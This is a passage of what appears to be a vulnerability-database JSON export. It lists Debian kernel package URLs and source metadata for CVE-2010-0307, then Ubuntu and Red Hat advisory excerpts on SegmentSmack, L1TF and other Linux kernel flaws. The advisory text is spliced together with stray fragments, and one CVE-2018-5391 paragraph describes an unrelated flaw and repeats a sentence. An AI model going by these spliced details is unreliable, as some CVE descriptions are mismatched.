        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-5kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64-smp_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-4kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-footbridge_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-ixp4xx_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26-21lenny2.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r4k-ip22_2.6.26-21lenny3_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.26.orig.tar.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-alpha_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-cobalt_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-openvz-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-footbridge_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-vserver_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-sparc64_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-mipsel_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-smp_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-arm_2.6.26-21lenny3_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-legacy_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-sparc_2.6.26-21lenny1_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-sparc64_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-alpha-generic_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-s390_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny3_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-libc-dev_2.6.26-21lenny3_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2010-0306"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1a-bcm91480b_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.26_2.6.26-21lenny1_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.26-2_2.6.26-21lenny3_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-s390x_2.6.26-21lenny2_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-r5k-cobalt_2.6.26-21lenny3_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-686-bigmem_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-sparc64_2.6.26-21lenny2_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-amd64_2.6.26-21lenny2_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-powerpc-smp_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-alpha-generic_2.6.26-21lenny2_alpha.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-parisc-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-xen_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-parisc64-smp_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-mckinley_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-itanium_2.6.26-21lenny1_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-powerpc_2.6.26-21lenny3_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-orion5x_2.6.26-21lenny3_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny2_mipsel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-vserver-686-bigmem_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-all_2.6.26-21lenny1_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-486_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_arm.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-686_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-itanium_2.6.26-21lenny3_ia64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-iop32x_2.6.26-21lenny1_armel.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-s390x_2.6.26-21lenny3_s390.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-vserver-amd64_2.6.26-21lenny2_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.26-2-xen-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-amd64_2.6.26-21lenny3_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny1_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common_2.6.26-21lenny2_hppa.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-sb1-bcm91250a_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.26-2-common-openvz_2.6.26-21lenny3_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-r5k-ip32_2.6.26-21lenny2_mips.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.26-2-4kc-malta_2.6.26-21lenny3_mipsel.deb"
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-42912"
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0307"
      },
      {
        "db": "BID",
        "id": "38027"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001203"
      },
      {
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "db": "PACKETSTORM",
        "id": "87376"
      },
      {
        "db": "PACKETSTORM",
        "id": "95883"
      },
      {
        "db": "PACKETSTORM",
        "id": "87629"
      },
      {
        "db": "PACKETSTORM",
        "id": "85802"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-160"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0307"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "VULHUB",
        "id": "VHN-42912"
      },
      {
        "db": "VULMON",
        "id": "CVE-2010-0307"
      },
      {
        "db": "BID",
        "id": "38027"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001203"
      },
      {
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "db": "PACKETSTORM",
        "id": "87376"
      },
      {
        "db": "PACKETSTORM",
        "id": "95883"
      },
      {
        "db": "PACKETSTORM",
        "id": "87629"
      },
      {
        "db": "PACKETSTORM",
        "id": "85802"
      },
      {
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-160"
      },
      {
        "db": "NVD",
        "id": "CVE-2010-0307"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2010-02-17T00:00:00",
        "db": "VULHUB",
        "id": "VHN-42912"
      },
      {
        "date": "2010-02-17T00:00:00",
        "db": "VULMON",
        "id": "CVE-2010-0307"
      },
      {
        "date": "2010-02-01T00:00:00",
        "db": "BID",
        "id": "38027"
      },
      {
        "date": "2010-04-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-001203"
      },
      {
        "date": "2011-02-11T13:13:00",
        "db": "PACKETSTORM",
        "id": "98419"
      },
      {
        "date": "2010-03-17T22:35:36",
        "db": "PACKETSTORM",
        "id": "87376"
      },
      {
        "date": "2010-11-16T18:01:26",
        "db": "PACKETSTORM",
        "id": "95883"
      },
      {
        "date": "2010-03-25T08:00:45",
        "db": "PACKETSTORM",
        "id": "87629"
      },
      {
        "date": "2010-02-01T16:55:27",
        "db": "PACKETSTORM",
        "id": "85802"
      },
      {
        "date": "2010-02-15T20:31:13",
        "db": "PACKETSTORM",
        "id": "86286"
      },
      {
        "date": "2010-02-17T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201002-160"
      },
      {
        "date": "2010-02-17T18:30:00.417000",
        "db": "NVD",
        "id": "CVE-2010-0307"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-02-13T00:00:00",
        "db": "VULHUB",
        "id": "VHN-42912"
      },
      {
        "date": "2018-11-16T00:00:00",
        "db": "VULMON",
        "id": "CVE-2010-0307"
      },
      {
        "date": "2015-04-13T21:21:00",
        "db": "BID",
        "id": "38027"
      },
      {
        "date": "2011-03-01T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2010-001203"
      },
      {
        "date": "2023-02-14T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-201002-160"
      },
      {
        "date": "2023-02-13T04:15:44.447000",
        "db": "NVD",
        "id": "CVE-2010-0307"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "local",
    "sources": [
      {
        "db": "BID",
        "id": "38027"
      },
      {
        "db": "PACKETSTORM",
        "id": "85802"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-160"
      }
    ],
    "trust": 1.0
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "x86_64 On the platform  Linux kernel of  load_elf_binary Service disruption in functions  (DoS) Vulnerabilities",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2010-001203"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "other",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-201002-160"
      }
    ],
    "trust": 0.6
  }
}

var-201808-1002
Vulnerability from variot

Linux kernel versions 4.9+ can be forced to make very expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() for every incoming packet which can lead to a denial of service. An input validation error vulnerability exists in the Linux kernel version 4.9+. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. (BZ#1594915)

  1. As a consequence, the virtualized guests sometimes mishandled the request to perform the microcode update and became unresponsive in the early boot stage. (BZ#1618386)

  2. ========================================================================== Ubuntu Security Notice USN-3742-3 August 21, 2018

linux-lts-trusty regressions

A security issue affects these releases of Ubuntu and its derivatives:

  • Ubuntu 12.04 ESM

Summary:

USN-3742-2 introduced regressions in the Linux Hardware Enablement (HWE) kernel for Ubuntu 12.04 ESM.

Software Description: - linux-lts-trusty: Linux hardware enablement kernel from Trusty for Precise ESM

Details:

USN-3742-2 introduced mitigations in the Linux Hardware Enablement (HWE) kernel for Ubuntu 12.04 ESM to address L1 Terminal Fault (L1TF) vulnerabilities (CVE-2018-3620, CVE-2018-3646). Unfortunately, the update introduced regressions that caused kernel panics when booting in some environments as well as preventing Java applications from starting.

We apologize for the inconvenience.

Original advisory details:

It was discovered that memory present in the L1 data cache of an Intel CPU core may be exposed to a malicious process that is executing on the CPU core. This vulnerability is also known as L1 Terminal Fault (L1TF). A local attacker in a guest virtual machine could use this to expose sensitive information (memory from other guests or the host OS). (CVE-2018-3646)

It was discovered that memory present in the L1 data cache of an Intel CPU core may be exposed to a malicious process that is executing on the CPU core. This vulnerability is also known as L1 Terminal Fault (L1TF). (CVE-2018-3620)

Andrey Konovalov discovered an out-of-bounds read in the POSIX timers subsystem in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. A remote attacker could use this to cause a denial of service. A remote attacker could use this to cause a denial of service. (CVE-2018-5391)

Update instructions:

The problem can be corrected by updating your system to the following package versions:

Ubuntu 12.04 ESM: linux-image-3.13.0-156-generic 3.13.0-156.206~precise1 linux-image-3.13.0-156-generic-lpae 3.13.0-156.206~precise1 linux-image-generic-lpae-lts-trusty 3.13.0.156.146 linux-image-generic-lts-trusty 3.13.0.156.146

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. 6.6) - noarch, x86_64

Bug Fix(es):

  • After updating the system to prevent the L1 Terminal Fault (L1TF) vulnerability, only one thread was detected on systems that offer processing of two threads on a single processor core. With this update, the "__max_smt_threads()" function has been fixed. (BZ#1625334)

  • Previously, a kernel panic occurred when the kernel tried to make an out of bound access to the array that describes the L1 Terminal Fault (L1TF) mitigation state on systems without Extended Page Tables (EPT) support. This update extends the array of mitigation states to cover all the states, which effectively prevents out of bound array access. Also, this update enables rejecting invalid, irrelevant values, that might be erroneously provided by the userspace. (BZ#1629633)

  • -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256

====================================================================
Red Hat Security Advisory

Synopsis: Important: kernel security and bug fix update Advisory ID: RHSA-2018:2384-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2018:2384 Issue date: 2018-08-14 CVE Names: CVE-2017-13215 CVE-2018-3620 CVE-2018-3646 CVE-2018-3693 CVE-2018-5390 CVE-2018-7566 CVE-2018-10675 ==================================================================== 1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - x86_64 Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64 Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server (v. 7) - noarch, ppc64le, s390x Red Hat Enterprise Linux for ARM and IBM Power LE (POWER9) Server Optional (v. 7) - noarch, ppc64le

  1. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Security Fix(es):

  • Modern operating systems implement virtualization of physical memory to efficiently use available system resources and provide inter-domain protection through access control and isolation. The L1TF issue was found in the way the x86 microprocessor designs have implemented speculative execution of instructions (a commonly used performance optimisation) in combination with handling of page-faults caused by terminated virtual to physical address resolving process. As a result, an unprivileged attacker could use this flaw to read privileged memory of the kernel or other processes and/or cross guest/host boundaries to read host memory by conducting targeted cache side-channel attacks. (CVE-2018-3620, CVE-2018-3646)

  • An industry-wide issue was found in the way many modern microprocessor designs have implemented speculative execution of instructions past bounds check. The flaw relies on the presence of a precisely-defined instruction sequence in the privileged code and the fact that memory writes occur to an address which depends on the untrusted value. Such writes cause an update into the microprocessor's data cache even for speculatively executed instructions that never actually commit (retire). As a result, an unprivileged attacker could use this flaw to influence speculative execution and/or read privileged memory by conducting targeted cache side-channel attacks. (CVE-2018-3693)

  • A flaw named SegmentSmack was found in the way the Linux kernel handled specially crafted TCP packets. A remote attacker could use this flaw to trigger time and calculation expensive calls to tcp_collapse_ofo_queue() and tcp_prune_ofo_queue() functions by sending specially modified packets within ongoing TCP sessions which could lead to a CPU saturation and hence a denial of service on the system. Maintaining the denial of service condition requires continuous two-way TCP sessions to a reachable open port, thus the attacks cannot be performed using spoofed IP addresses. (CVE-2018-5390)

  • kernel: crypto: privilege escalation in skcipher_recvmsg function (CVE-2017-13215)

  • kernel: mm: use-after-free in do_get_mempolicy function allows local DoS or other unspecified impact (CVE-2018-10675)

  • kernel: race condition in snd_seq_write() may lead to UAF or OOB access (CVE-2018-7566)

For more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.

Red Hat would like to thank Intel OSSIRT (Intel.com) for reporting CVE-2018-3620 and CVE-2018-3646; Vladimir Kiriansky (MIT) and Carl Waldspurger (Carl Waldspurger Consulting) for reporting CVE-2018-3693; and Juha-Matti Tilli (Aalto University, Department of Communications and Networking and Nokia Bell Labs) for reporting CVE-2018-5390.

Bug Fix(es):

These updated kernel packages include also numerous bug fixes. Space precludes documenting all of the bug fixes in this advisory. See the descriptions in the related Knowledge Article:

https://access.redhat.com/articles/3527791

  1. Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

  1. Bugs fixed (https://bugzilla.redhat.com/):

1535173 - CVE-2017-13215 kernel: crypto: privilege escalation in skcipher_recvmsg function 1550142 - CVE-2018-7566 kernel: race condition in snd_seq_write() may lead to UAF or OOB-access 1575065 - CVE-2018-10675 kernel: mm: use-after-free in do_get_mempolicy function allows local DoS or other unspecified impact 1581650 - CVE-2018-3693 Kernel: speculative bounds check bypass store 1585005 - CVE-2018-3646 Kernel: hw: cpu: L1 terminal fault (L1TF) 1601704 - CVE-2018-5390 kernel: TCP segments with random offsets allow a remote denial of service (SegmentSmack)

  1. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source: kernel-3.10.0-862.11.6.el7.src.rpm

noarch: kernel-abi-whitelists-3.10.0-862.11.6.el7.noarch.rpm kernel-doc-3.10.0-862.11.6.el7.noarch.rpm

